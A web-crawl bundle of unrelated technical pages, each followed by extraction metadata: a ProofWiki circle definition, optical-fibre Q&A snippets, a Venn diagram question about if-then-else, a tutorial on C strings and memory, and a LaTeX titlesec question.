• I am working on becoming more familiar with it, not clear on it yet – Sam Houston May 21 '15 at 12:47 | 2019-10-17 05:26:13 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9057852029800415, "perplexity": 582.5121461346546}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-43/segments/1570986672723.50/warc/CC-MAIN-20191017045957-20191017073457-00478.warc.gz"} |
https://proofwiki.org/wiki/Definition:Conic_Section/Reduced_Form/Circle | # Definition:Conic Section/Reduced Form/Circle
Let $K$ be a circle embedded in a cartesian coordinate plane.
$K$ is in reduced form if and only if its center is located at the origin. | 2020-01-28 06:27:25 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7690779566764832, "perplexity": 272.8398639407864}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 20, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-05/segments/1579251776516.99/warc/CC-MAIN-20200128060946-20200128090946-00528.warc.gz"} |
https://electronics.stackexchange.com/tags/optical-fibre/hot | # Tag Info
60
It seems like you're referring specifically to http://www.nature.com/nphoton/journal/v8/n11/full/nphoton.2014.243.html . It can be read here: https://www.researchgate.net/publication/269099858_Ultra-high-density_spatial_division_multiplexing_with_a_few-mode_multicore_fibre . In this case, it's slightly more complicated than "an optical signal". The link ...
51
This is where the measurement scientist has to go into full sceptical and investigative mode. First thing. Fibre, as a passive material, is lossy. It absorbs power. Therefore the power arriving at the end of a length of fibre will be less than was launched. Period. No arguments. We don't do over-unity here. So what causes your observations? Single mode, ...
43
Rather than worrying about a research paper that's pushing things to the limit first start by understanding the stuff sitting in front of you. How does an SATA 3 hard drive in a home computer put 6 Gbits/s down a serial link? The main processor isn't 6 GHz and the one in the hard drive certainly isn't so by your logic it shouldn't be possible. The answer ...
26
The other answers have suggested some ways your experiment might have gone wrong. Let me tell you how to do a fiber attenuation measurement correctly. The standard technique is called a cut-back measurement. This means you set up your source feeding a long piece of fiber (say, 10 m). You then direct the output of that fiber into a large-area detector (...
17
In addition to the answer of TimB, there is another advantage of this optical communication. With RCA, the two networks connected have to be referenced to each other. In the case of optical, there is galvanic isolation between the two. As a result, there might be less issues with ground loops, networks can remain isolated, etc. It also means that the ...
16
Neil_UK's answer is pretty much spot on, i.e. your measurements are broken. :-( The first and most obvious problem is in the lengths chosen, 1m and 30m: These are both well within the edge effect ranges, i.e. the quality of the fiber end connections will dominate any actual attenuation loss. In particular, good quality single mode fiber at 1300 nm can come ...
15
Ignoring the details of the specific transmission in question (which @alex.forencich has already discussed in considerable detail), it seems like it's probably useful to consider the more general case. Although this particular transmission hit 255 Tbps through the fiber, extremely fast fiber links are already in regular use. I'm not sure exactly how many ...
15
I want to ask, within the scope of digital audio transmission, it is their any observable or measurable differences between the two cables? Actually, yes. Isolation: Optical fiber isn't conductive, so it solves ground loops, hum/buzz issues and any is insensitive to RF interference. Coax can also be isolated with a transformer, however this adds to the ...
14
You are right, this is the case but fiber optics can still have problems that can be perceived as noise that lead to incorrect data: Intersymbol interference: This is a kind of noise because the previous symbol that was sent will interfere with the actual symbol that is being sent. Thus the previous symbol will act as noise. Well known techniques to help ...
8
First, when you talk about the "speed" of a signal in optical fiber, that's ambiguous. You should be clear about whether you're interested in the latency (the time it takes a signal to travel from one end of the fiber to the other) or the bit rate. In this case, it seems most likely you're interested in the latency, or propagation delay. In my opinion if ...
6
Your photo appears to be SFP/SFP+ transceivers. SFP isn't really a connector type, is a transceiver standard. The actual connector (on the switch side) is a board edge connector, the other side can be a wide variety of connectors. If it's the actual fibre connector you're talking about, probably LC connector, which is the optical connector used in just ...
6
One-way Ethernet cables won't work with Gigabit network equipment and later, because without a return path the autonegotiation sequence will never complete. You'll see a "Network cable unplugged" or an equivalent message on both devices if you try to use such a cable. Older Ethernet devices won't work with simple one-way cables either, but can be fooled to ...
5
Depending on the units of the loss coefficient $\alpha$, there are two ways to calculate optical loss in a fiber, or any other uniform medium. For $\alpha$ in units of [1/length], $$\frac{P}{P_0} = e^\left({-\alpha_{1/km} L}\right)$$ For $\alpha$ in units of [dB/length] $${P \over P_0} = 10^{-\alpha_{dB/km} L/10}$$ You can set these two ...
5
If you want "one way data direction", you have to do it at a higher level. Various things assume bi-directional communication at the low levels, even if app-level data is only flowing one way. For example, even if you send data in only one direction over a TCP connection, there will still be packets going back and forth in both directions. You can get ...
5
In the Gigabit Ethernet world, the media access controller (MAC) communicates with the physical layer chip (PHY) through the Gigabit Medium-Independent Interface (GMII) The GMII is an 8-bit-wide interface carrying 1000 Mb/s. So its clock rate is 125 MHz. The Physical Coding Sublayer (PCS) within the PHY performs the 8b/10b encoding. So its output rate is ...
5
Fiber optic does not radiate electromagnetically, but more important is that is immune to electromagnetic interference that can cause data corruption on copper in extreme conditions. Such interference may come from the arcing of a switch being switched off under load, or can be generated by a motor under high load.
4
You could add additional modulation, it would keep the receiver devices ALC features happy. As you have at least 3 MBit/s data rate available you have quite a lot of headroom. You could use basic FSK modulation with two tones of say 250kHz and 1000 kHz. This would let you use a rather simple demodulator (pulse width comparator) and have less than 20% bit ...
4
Since that device includes a PHY for wired ethernet over twisted pair copper, chances are you can't directly attach it to anything but twisted pair copper ethernet. The datasheet lacks any reference to standards, so it's very likely it's been tuned to exactly and exclusively that purpose. Best thing you can do is build it for wired ethernet, than use one of ...
4
The short answer is that for the kind of work you're talking about, an oscilloscope probably isn't a particularly useful piece of equipment. An oscilloscope can be useful for things like designing/testing/measuring the design of a network adapter, to assure against doing things like running (what are supposed to be) separate lines too close to each other so ...
4
The problem here is not the feasibility of the modulation, but the ability for cables to carry high speed signals. Especially with long length, it is much easier (and economical) to carry a high speed signal on en optical fiber than on an electric cable.
4
Do we use a similar filter after the photodiode to get rid of the out-of-signal-space noise, before sampling? Generally, we don't have a separate filter device or circuit. We'd rather connect the photodiode directly to a trans-impedance amplifier (TIA) chip to avoid losses due to impedance matching (the photodiode produces a current signal so we'd rather it ...
3
The primary limitation of the signal bandwidth of optical fiber is dispersion. Dispersion, as the term is used in fiber optics, is when one component of the signal propagates faster than another component. This leads to narrow input pulses stretching in duration as they propagate along the fiber, causing the fiber to act as a low-pass filter on the signal. ...
3
To make proper comparisons between fibre and cable you have to consider the photodiode at the end of the fibre to be part of the fibre and this is the weak link in terms of noise. Typically the Hamamatsu S5973 photodiode produces a noise equivalent power (NEP) of $1.5 \times 10^{-15}$ watts per Hz and given that the device is good for 1 GHz the noise power ...
3
As the question is tagged with "optical-fiber", I assume you mean the damping of the fiber. In this context, both numbers cannot be equal because a damping greater than 0 dB would be equivalent to a damping factor greater than 1. A damping of 0.22 dB would mean that the input power is $10^{0.022} = 1.05$ times higher then the output power.
3
This is somewhat oversimplified, but it gets the basics right. Think of a beam of white light shining into a prism. The output will be a rainbow, which means that the different colors exit the prism at different angles. A prism will work just fine "in reverse". That is, if you take a series of lasers of different colors, place them where their colors ...
3
Yep, high speed photodiodes are the simplest way to do this. A receiver will usually consist of a photodiode and transimpedance amplifier (current in, voltage out). After that, it's just a high speed serial electrical signal, and that gets fed into clock data recovery circuitry, deserializers, etc. There can be components in front of the photodiode, though. ...
3
It is possible on 10BASE-T and 100BASE-TX, but not on 1000BASE-T because the latter uses bidirectional transmission on each pair. To enable such a mode, you need an MDIO/MDC (management) access to the PHY at least at the TX side of the one-way link, to configure it like the following: disable AUTONEG force 100BASE-TX (or 10BASE-T, but not 1000BASE-T) force ...
3
In this context, a span is the cable length between two amplifying stations.
3
SONET is kind of popular in the telecomms world, very different to ethernet, and kind of cool in its way. In reality many non ethernet uses exist, but we tend to try to use rates that are close enough to something used by either the phone company or the datacenter because economies of scale make optical modules for those line rates all kinds of cheap. ...
3
Looking at what's in the SFP modules, it may not be all that difficult to use them directly. Since the signals are AC coupled to LVDS, you'll need to communicate in a DC balanced protocol such as Manchester, which your chosen ARM may or may not support (my current favorite Microchip SAME70 does support it). And, of course, add LVDS receiver/transmitters. ...
Only top voted, non community-wiki answers of a minimum length are eligible | 2020-05-29 00:10:57 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.4832709729671478, "perplexity": 1168.5477907480574}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-24/segments/1590347401004.26/warc/CC-MAIN-20200528232803-20200529022803-00405.warc.gz"} |
http://math.stackexchange.com/questions/219682/mathematical-logic-and-venn-diagrams | # Mathematical Logic and venn diagrams
Okay so I'm pretty confused about how to sketch a venn diagram for this operator: ifte(a,b,c) (or this can be written a?b:c)
given a, b, c truth table and a?b:c
$$\begin{array}{c|c|c||c} a & b & c & a?b:c\\ \hline F & F & F & F\\ \hline F & F & T & T\\ \hline F & T & F & F\\ \hline F & T & T & T\\ \hline T & F & F & F\\ \hline T & F & T & F\\ \hline T & T & F & T\\ \hline T & T & T & T \end{array}$$
I hope this truth table is clear enough. Okay so I'm asked to draw a venn diagram for this. So I can see that if 'a' is true 'b' is true but 'b' can be true while 'c' is true without 'a' being true and 'c' can be true by itself. But what does this mean for a venn diagram? :/
ifte is "if-then-else"
-
I've added a picture explaining what's going on here. Hope it helps. – Rick Decker Oct 24 '12 at 16:09
A Venn diagram with three sets $A,B,C$ divides the universe into 8 distinct regions, as you can see in the picture below.
For example, the $A$ circle contains 4 regions: the upper region with an arrow pointing to it represents $A=true, B=false,\text{ and }C=false$, since that region is contained in $A$ but not in $B\text{ or }C$ For your function, the truth table already identifies the truth values of the points in each of the 8 regions. For each of these, place a marker in those regions where your truth table says the function evaluates to $true$, as I did in the other region pointed to by an arrow. Your function is $true$ in four cases; I've put a dot in each. (Your conventions for marking regions might differ from mine: you might want to shade them rather than placing a dot.) | 2015-09-01 02:22:45 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.6244703531265259, "perplexity": 339.7977188287034}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2015-35/segments/1440644068749.35/warc/CC-MAIN-20150827025428-00090-ip-10-171-96-226.ec2.internal.warc.gz"} |
http://www.gamedev.net/page/resources/_/technical/general-programming/string-usage-and-architecture-r2061 | • Create Account
Calling all IT Pros from Canada and Australia.. we need your help! Support our site by taking a quick sponsored surveyand win a chance at a \$50 Amazon gift card. Click here to get started!
Like
0Likes
Dislike
# String Usage and Architecture
By Andy Oxfeld | Published Mar 10 2004 12:05 PM in General Programming
string strings str1 char character str characters str2 memory
If you find this article contains errors or problems rendering it unreadable (missing images or files, mangled code, improper text formatting, etc) please contact the editor so corrections can be made. Thank you for helping us improve this resource
# Introduction
Strings are vital to any game programming project. Strings are used for many important tasks, including outputting text, reading and writing data to and from files, multiplayer programming via
sockets, and many other uses.
Most games are currently programmed using C/C++. However, unlike languages such as Visual Basic, C++ does not include built-in support for high-level strings. Higher level strings can be used in
C++ with the Standard C++ Library's string class, the MFC library's CString class, or a custom written string class. Even still, there are many situations where standard C strings may be a better
choice -- such as when performance is needed, or for multi-platform programming, where C is commonly used. And knowing how C strings actually work will allow a programmer to utilize higher-level
string classes more effectively.
# Array and Memory Management Basics
To understand how C strings actually work, it is first important to understand basic memory management, as well as arrays.
## Basic Memory Management
There are two ways that memory is allocated in C/C++: on the stack, and on the heap. Memory is allocated on the stack when you declare a variable or array inside a function, like this:
void stackfunc()
{
char test; // This variable is allocated on the stack
char anarray[500]; // This entire array is allocated on the stack
}
Memory allocated on the stack has many advantages. First, allocating it is fast: this is important in games. Second, memory allocated on the stack is automatically freed when you are done with it.
The main disadvantage is that you must know exactly how much memory you will need at compile time.
The alternative is to allocate memory on the heap. Memory can be allocated on the heap by using global variables, by using the malloc() and free() functions (C/C++), or by using the new and delete
operators (C++ only). For example:
int myarray[300]; // This array is allocated on the heap
void heapfunc()
{
char* heapvar;
char* heapvar2;
char* heaparray;
int arraysize = 500;
heapvar = new char;
heaparray = new char[ize];
heapvar2 = (char*)malloc(sizeof(char));
delete heapvar;
delete [] heaparray;
free(heapvar2);
}
When memory is allocated on the heap by using global variables, it is automatically freed for you. However, if it is allocated on the heap by using malloc/free or new/delete, you must free it
explicitly, as done in the example. Allocating memory on the heap is slower than allocating memory on the stack, but we can allocate a dynamic amount, such as here, where the amount to allocate for
heaparray is stored in an int. Also, memory allocated on the heap, unlike memory allocated on the stack, gives you explicit control over when memory is allocated and freed. Note that in the example
above, the actual pointers are still allocated on the stack -- it's the memory that they point to that is allocated on the heap.
## Arrays
Arrays are frequently taught early in most introductory computer science courses; however, their inner workings are rarely discussed in detail. To illustrate, I will use the following code
sample:
void arrayfunc()
{
int myarray[5];
}
You may be surprised to know that arrays aren't a magical data type or feature of C/C++. In this example, myarray is just a variable of type int* (a pointer to an int). But what does myarray point
to? Let's take a look at a graphic representation of myarray.
In this image, we can see that myarray is nothing more than a pointer to the FIRST element in the 5-element array. This fact will be the basis for some of our more advanced string manipulation
methods shown later in this article. This is also why passing an array to a function is fast -- you're not passing the entire contents of the array, you're just passing where the contents of the
array are stored in memory.
Also, you may not know that myarray[2] is really just shorthand for *(myarray+2). In fact, 2[myarray] works the same as myarray[2], because *(myarray+2) is the same as *(2+myarray). "3">
# Null-Terminated Strings
## Memory Arrangement of Strings
A string in C is just an array of type char. Type char takes up 1 byte of memory per element, and can have values between -127 and 128 (but value less than 0 are rarely used). In each element of
the array, a special ANSI character code is placed to represent the character in that position in the string. These character codes are really just numbers. For example, the character A is 65, B is
66, C is 67, etc. You usually do not need to know these codes while programming; if you place a character in single-quotes, the compiler will replace it with the number that represents that
character. For example, 'A' is equivalent to 65, 'B' to 66, 'C' to 67, etc.
Note: There is an alternate standard to the one described above, called Unicode, or sometimes "wide chars". Unicode uses an array of type short, rather than char. However, Unicode is
used mostly in applications, not games, and is thus beyond the scope of this article.
Standard C strings usually have another property: they are "null-terminated". That means, the element after the last character in the string is the character code 0 ('\0'). This is NOT the
printable number 0, whose character code is 48. For example, here is how the string "Hello" would be stored in memory:
Due to this trailing 0 (called a NULL character), you must make sure that that the size of your char arrays are one element bigger than the maximum-length string you want to be able to use. For
example, to store the string "Hello", which is 5 characters long, we must use a char array at least 6 characters long. However, it could be longer -- any data after the trailing NULL is ignored.
Thus, in the example above, we could change the first 'l' to a NULL, leaving us with the string "He", and causing the remaining "lo" to be ignored.
## Assigning Strings by Hand
The following code example stores "Hello" in a string, albeit in a very primitive manner:
void stringfunc()
{
char str[50];
str[0] = 'H';
str[1] = 'e';
str[2] = 'l';
str[3] = 'l';
str[4] = 'o';
str[5] = 0;
}
Observe that, when constructing a string by hand, we must explicitly set the last character to NULL. Also note that we've completely ignored the contents of the string after the NULL
character.
## Using Math Operators on Strings
You may be tempted to use operators like equals (=) or addition (+) to assign or concatenate strings, as done in many languages. However, that does not work. Let's look at what happens when you
use the equals operator on a string:
void stringfunc2()
{
char str1[3];
char* str2;
str1[0] = 'H';
str1[1] = 'i';
str1[2] = 0;
str2 = str1; // Does not work as expected!
}
This example tries to do something which seems intuitive: set a string equal to the contents of another. However, as we learned in the previous section, str1 and str2 are nothing more than
pointers to the first elements of their respective strings. All that code does is cause str1 and str2 to point to the same area of memory. Thus, str2 becomes an "instance" of str1; any changes done
to str1 will change str2, and any changes done to str2 will change str1. There will actually be cases where we want to do this, as we'll see later on in this article, but this is not how you copy the
contents of one string to another.
# Basic String Functions
## String Assignment and Concatenation
The standard C library comes with a plethora of functions to manipulate strings in many ways. The two most basic ways you can manipulate strings are assignments and concatenations. We covered the
"hard way" to do assignments in the last section: by setting each element, including the trailing NULL, by hand. Here, we'll show the "hard way" to do concatenations (adding a string onto the end of
another string), by concatenating the string " World" onto the end of "Hello":
Warning: This code example is advanced. Do not worry if you do not understand it. A much simpler way to accomplish the same task will be presented shortly in the article.
void stringfunc3()
{
char str[50];
// Set to "Hello"
str[0] = 'H';
str[1] = 'e';
str[2] = 'l';
str[3] = 'l';
str[4] = 'o';
str[5] = 0;
// Concatenate " World"
// First, find the end of the string
char* strp = &str[0]; // Set a pointer to the first element
// Note that we could have done str, rather than &str[0], since str
// itself is a pointer to the first element
// Increment strp until it is equal to the trailing NULL
while (*strp) strp++;
// Now, strp is effectively a string that starts just after the last character of str!
// We can now set it to " World" just like we set str to "Hello" above.
strp[0] = ' ';
strp[1] = 'W';
strp[2] = 'o';
strp[3] = 'r';
strp[4] = 'l';
strp[5] = 'd';
strp[6] = 0;
// If you printf or cout str, you will find it is now "Hello World"
}
Note that, when concatenating " World" onto the end of "Hello", the first character of " World" overwrote the terminating NULL character, which was then re-added at the end of the new string.
## Easy String Assignment and Concatenation
It seems like a lot of work to assign and concatenate strings! Fortunately, there are two functions that make our lives a lot easier: strcpy() and strcat(). Here is the last code example rewritten
using strcpy and strcat:
void stringfunc3()
{
char str[50];
strcpy(str, "Hello");
strcat(str, " World");
}
Talk about easier! The strcpy function takes two parameters: destination string and source string (in that order). It copies the contents of source string into destination string (much like you
would expect dest = source to do). Note that rather than copying "Hello", we could have copied the contents of another string.
The strcat function concatenates the source string (the second string) onto the end of the destination string. This is much like you would expect dest += source to do.
Observe that we did not have to do anything special with the trailing NULL character. Both strcpy and strcat handle the trailing NULL character for us. We still have to ensure there is enough room
for both the string and the trailing NULL character in the array, though.
## Protecting Against Overflows
I just mentioned that you need to make sure there is enough space for the string and the trailing NULL character inside the array. But what if there isn't? What if we ask the user to type in their
name, and they type in a really long name? If we use strcpy and strcat, these functions will attempt to write past the end of the string, usually resulting in a crash. To prevent that, most string
functions, including strcpy and strcat, have so-called "counted" variants. Here is the previous function safely rewritten using counted functions:
void stringfunc3()
{
char str[50];
strncpy(str, "Hello", 49);
strncat(str, " World", 49 - strlen(str));
}
The first line isn't much changed, except we call the counted version of strcpy, which is strncpy, and pass it the maximum string length. Note that we pass it 49 rather than 50, because the
maximum string length is actually 49 (one character must be left for the trailing NULL). This tells strncpy not to copy more than 49 characters, to prevent a overflow.
The second line is a bit more complicated, and introduces a new function, strlen(). strlen will return an integer representing the length (not including the trailing NULL) of a string. This
function is needed because the parameter to strncat tells it how many characters to append, not how many characters the final string should be. So, we subtract from 49 the current length of the
string to find the maximum number of characters we can append.
Except for in time critical sections of code, ALWAYS use the counted variants of string functions! The rest of this article will always use counted functions where they are available.
## Comparing Strings
Just like you can't assign a string to another using equals in C/C++, you can't compare strings using == as you can with numbers. To compare strings, you must use the strcmp function. strcmp's
return value system is a bit counter-intuitive. This table shows what it returns:
strcmp(first, second) Return Value first comes before second (A-Z order) < 0 first is the same string as second == 0 first comes after second (A-Z order) > 0
Here is an example of usage of strcmp:
void stringfunc4()
{
char str1[50];
char str2[50];
char str3[50];
char str4[50];
strncpy(str1, "Hi", 49);
strncpy(str2, "Hi", 49);
strncpy(str3, "Bye", 49);
strncpy(str4, "hI", 49);
if (!strcmp(str1, str2)) // This if statement is TRUE: They are equivalent
{
printf("str1 and str2 are equivalent\n");
}
if (!strcmp(str1, str3)) // This if statement is FALSE: They are NOT equivalent
{
printf("str1 and str3 are equivalent\n");
}
if (!strcmp(str1, str4)) // This if statement is FALSE: They are NOT equivalent (different case)
{
printf("str1 and str4 are equivalent\n");
}
}
Contrary to what seems obvious, strcmp actually returns 0 if the strings ARE equivalent, which is why we negated it with the ! operator. Refer to the table above for more detail on what strcmp
returns.
strcmp is also case sensitive: it will consider "Hi" as a different string than "HI", "hi", and "hI". Most architectures also have a case-insensitive version available, but it is less standard.
The function is usually called stricmp, _stricmp, or strcasecmp.
Note: We did not use the counted version of strcmp here (strncmp). This is because strcmp does not change the value of either strings. strncmp is only needed for certain situations
where you only want to compare the beginning parts of strings.
Setting complicated strings using strcpy and strcat can get tedious. For advanced, powerful output, the sprintf function is available. In fact, it is exactly the same as the printf function,
except that it takes an extra parameter, the string to "print" to. The format specifiers of sprintf are very powerful, and beyond the scope of this article; look them up in your helpfile/manpages for
more options. Here are some examples:
void stringfunc5()
{
char str1[100];
char str2[100];
// Produces: "30 people ate 20 pieces of cheese."
snprintf(str1, 99, "%d people ate %d pieces of cheese.", 30, 20);
// Produces: "3.3000 quick brown foxes jumped over 27 lazy dogs."
snprintf(str2, 99, "%f quick %s foxes jumped over %d %s dogs.", 3.3, "brown", 27, "lazy");
}
With sprintf, it's even more important to use the counted version (snprintf) than with strcpy and strcat, because you usually won't have much of an idea how long the final string will be.
Parsing strings can be one of the more complicated parts of string programming. The sscanf function, similar to the keyboard scanf function, can make life a lot easier. It uses the same format
specifiers as sprintf, although integers and floats must have their addresses passed. Let's take an example:
void stringfunc6()
{
char str1[100];
char str2[100];
char str3[100];
int anint;
// Example 1: Seperate words in a string
strncpy(str1, "Hello there", 99);
sscanf(str1, "%s %s", str2, str3);
// Example 2: Expects a string giving a noun, and the number of that noun present
strncpy(str1, "5 bears", 99);
sscanf(str1, "%d %s", &anint, str2);
}
Like sprintf, sscanf is a complicated function, with complex formatting options. Refer to your help file or manpages for more detail about using sscanf.
# String Manipulation Tricks
This last section describes some advanced tricks we can do with strings by playing with pointers and NULL termination characters.
## Stripping Characters from the Beginning of a String
One of the more common things to do with strings is to strip a certain number of characters off the beginning and end of a string. Here is how to strip characters off the beginning:
void stringfunc7()
{
char str1[100];
char* str2;
strncpy(str1, "The first four characters will be stripped off.", 99);
str2 = str1 + 4;
printf("%s", str2); // Prints: first four characters will be stripped off.
}
str2 is now str1, but with the first 7 characters stripped off. The nice thing about this method is that str1, including the first 7 characters, is still intact.
This method works because str1 is really just a pointer to the first character in the string. By making str2 a character to the fifth character, we strip off the first four characters. Here is a
graphic representation of what we just did:
Warning: Just like above, when we set one string equal to another, str2 is now an instance of str1. Thus, any changes made to str1 will affect str2, and any changes made to str2
will affect str1. Use this technique carefully.
## Stripping Characters from the End of a String
Unfortunately, strings don't operate by using pointers to the ends of strings, so we can't strip characters from the end using the same method. But, we can strip characters by adding NULL
characters before the actual end of the string, effectively changing the end. Keep in mind that all string functions assume a string has ended as soon as they hit a NULL, and ignore anything past it.
Here is an example:
void stringfunc8()
{
char str1[100];
char str2[100];
strncpy(str1, "All but the first 15 characters of this string will be stripped off.", 99);
strncpy(str2, "The last 9 characters of this string will be removed.", 99);
// Adding a NULL at the 16th element (15) leaves the first 15 (0-14) intact.
str1[15] = 0;
// Similar to the above line, but uses strlen to calculate the length.
str2[strlen(str2) - 9] = 0;
printf("%s", str1); // Prints: All but the fir
printf("%s", str2); // Prints: The last 9 characters of this string will be
}
This method is slightly less elegant than the above method, as it effectively destroys the part of the string that we strip off, unlike stripping from the beginning, which leaves the beginning
intact. In our example, with str1, we COULD later restore the string by storing the value of str[15] in a char, and setting str[15] to it when we wanted the string back. With str2, we would have to
save both the index (strlen(str2) - 9), as well as the value of the character at that position.
## Conclusion
As you have learned, standard C strings are powerful and complex, yet elegant. While you may prefer to use the standard C++ library string class, since it is easier to use and safer, you now have
a good idea about how things work behind the scenes. | 2015-08-31 23:58:00 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.24978098273277283, "perplexity": 2502.162972922545}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2015-35/segments/1440644068184.11/warc/CC-MAIN-20150827025428-00167-ip-10-171-96-226.ec2.internal.warc.gz"} |
https://tex.stackexchange.com/questions/523200/titlesec-calculate-correct-width-for-section-heading-background | # titlesec: calculate correct width for section heading background
I’m using titlesec to place section numbers in the left margin and also to apply a shaded background that spans the width of the page.
I’m now also using wrapfig, and some section headings are being wrapped around figures. How do I adjust my definition of \colorsection so that the background extends only to the right margin, rather than beyond it?
\documentclass{article}
\usepackage{titlesec}
\usepackage{mwe}
\usepackage{wrapfig}
\usepackage{graphicx}
\usepackage{xcolor}
% https://tex.stackexchange.com/questions/40034
\newcommand{\colorsection}[1]{\colorbox{blue!20}{\parbox[t]{\dimexpr\textwidth-2\fboxsep}{#1}}}
% https://tex.stackexchange.com/questions/523000
\newcommand*{\marginsecnumber}[1]{\makebox[0pt][r]{#1\hspace{6pt}}}
\titleformat{\section}{\Large\bfseries}{\marginsecnumber\thesection}{0em}{\colorsection}
\begin{document}
\section{Section}
\begin{wrapfigure}{l}{2.5in}
\includegraphics[scale=0.5]{example-image-a}
\end{wrapfigure}
Here's some example text, not too much.
\section{Another section}
\end{document}
Simply replace \textwidth with \linewidth in the dfinition of \colorsection:
\documentclass{article}
\usepackage{titlesec}
\usepackage{showframe}
\renewcommand{\ShowFrameLinethickness}{0.3pt}
\usepackage{mwe}
\usepackage{wrapfig}
\usepackage{graphicx}
\usepackage{xcolor}
% https://tex.stackexchange.com/questions/40034
\newcommand{\colorsection}[1]{\colorbox{blue!20}{\parbox[t]{\dimexpr\linewidth-2\fboxsep}{#1}}}
%
% https://tex.stackexchange.com/questions/523000
\newcommand*{\marginsecnumber}[1]{\makebox[0pt][r]{#1\hspace{6pt}}}
\titleformat{\section}{\Large\bfseries}{\marginsecnumber\thesection}{0em}{\colorsection}
\begin{document}
\section{Section}
\begin{wrapfigure}{l}{2.5in}
\includegraphics[scale=0.5]{example-image-a}
\end{wrapfigure}
Here's some example text, not too much.
\section{Another section}
\end{document}
